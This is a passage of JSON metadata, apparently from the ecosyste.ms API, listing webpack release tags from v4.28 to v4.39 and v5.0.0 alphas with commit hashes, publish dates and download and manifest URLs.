Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","ki